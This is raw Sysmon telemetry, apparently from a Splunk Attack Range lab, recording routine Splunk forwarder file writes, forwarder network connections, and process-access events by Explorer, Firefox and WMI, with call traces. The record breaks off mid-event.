23542300x8000000000000000150098Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:30.900{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A3CF15B9F7CE9A8B9F685A1EC4FFA94,SHA256=B844BD6B7E7E23C0EE87C6E4F38D1999794569194B3E1796DFCC620E1BE2E41E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150097Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:29.016{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58366-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150096Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:30.218{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4F317C3E15A9AAC515AED69578287A4,SHA256=633BD5A70A556D2EF193E9B62DFE05786FDC28829A7F5F1AAC48BD5B7E6CADFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104644Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:31.722{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C183C9A0D4E26792EB34A3206827CE58,SHA256=B277E070776ADA6BC51839DCADDAB5ED4F339375355C2E2A67E061FA12A44FAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150101Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:31.916{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8C617E2202F76FE1D6C8CFEE46C2877,SHA256=CE8E066C2175CBA692CCA82F86B3A13BFC7DB42F2F34865D9C0769A5DCA54709,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150100Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:31.579{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150099Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:31.117{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000150103Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:32.916{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EEDDC43ED960492FB9C4140B883EF5C,SHA256=946321055ECF05EF5974CE679C61F828EE41E14C7E1ACF2DB97108B8C28D1C4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150102Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:32.647{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57321E1A6AD72BB8C09B06E221403342,SHA256=7769D1A313EABDECED6EDED1CA01CE94A20559CE7FCF102D6642F9A40471B183,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104645Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:33.092{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FF37AAC0E376216443897AB08FE8DE6,SHA256=C166E12B879B0FC82F45DDC3E257CE18E0D0FF66FC0CE7560734774ADF5C13F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150104Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:33.931{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=509EF619BAD4E9E34CC3ED63630B6033,SHA256=6589ACAFCF35EFF9758F2423B4CC3F8B4C0CE18478AA434580D34A1D53610F5D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104647Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:32.931{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55395-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104646Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:34.459{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F6807F39A525A7ABEA3B2ED8040A544,SHA256=9164FA93C705AB4738C5C1224882C910855032D86D4F1FF72EB84A8A976CD884,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150111Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:34.932{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA4CD7C496631E1C1703C55D6818D4E0,SHA256=C554C60BA164B3207E106D6001B025A7517DAECB807A78B3E30F4801996D6F9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150110Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:34.800{39BD8DE3-0FD9-60CA-8B00-00000000D101}19886584C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150109Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:34.800{39BD8DE3-0FD9-60CA-8B00-00000000D101}19886584C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150108Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:34.800{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150107Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:34.800{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150106Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:34.800{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150105Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:34.800{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104649Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:35.823{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8FDA8201CDB5A730C831221C614E87EB,SHA256=20A1369222E9A39E0852D3A5AF25A28F0F4BFFF36E4191395EB7BBB6DDB7CC0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104648Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:35.819{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=489522A40E77A0A606CE1EF031205DDB,SHA256=240F470D84B910A4CDAFCC9E8A7965183A404B0AD516E72572DA5369A7FFF7D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150113Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:35.947{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0612820702C6DA286EAFD78004A2F32,SHA256=AEEAD54EAC0024F602AF311B8402A8BDC3AC6EF9E6E072F86FA99C0627D17AF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150112Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:35.947{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\cache2\doomed\2888MD5=706CA6E36F23876C0761893C03577C49,SHA256=58D7E9E5EA5D9BDF3C756DE3FDC9968099DBFDB0CD9670C8E2BF4331CB9F4BA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150116Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:36.954{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=275AF6E47C81407ABBD4CAB85D5B8F80,SHA256=EA81B5BCD62933C22B89C1F1C4B281803C210025F920F2CA5CA5513A540E7519,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150115Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:34.900{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58370-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150114Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:36.132{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=10443E6E70E4B40E4CF7B35B1CB35676,SHA256=0089D1C0724EAD0A62BBC166C54894ABC39C88B96B6C15C781A8537540110DE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104650Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:37.181{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=040331BCE61B19CEE3BEC116D1295B37,SHA256=20261AB812911A11366F05CCEC1F0161EF1867E84353812803E0004717AEA5E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150252Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.955{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=396DA082CC536C6BA701330079B6A9C8,SHA256=8CAD633A4ADF16DB8DEE34EA8F481FB7E4BD0BD089D62B48ACC77D441BB9321A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150251Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.908{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3094528741F7EC13BB758A502BAC771D,SHA256=16DC5D1BA6EEC07A7514D1ECB7FA00E89169D2E17FA7335ADF6DD38E9D65F4E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150250Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150249Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150248Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150247Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150246Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-0FD9-60CA-8B00-00000000D101}19886584C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150245Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150244Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150243Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150242Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program 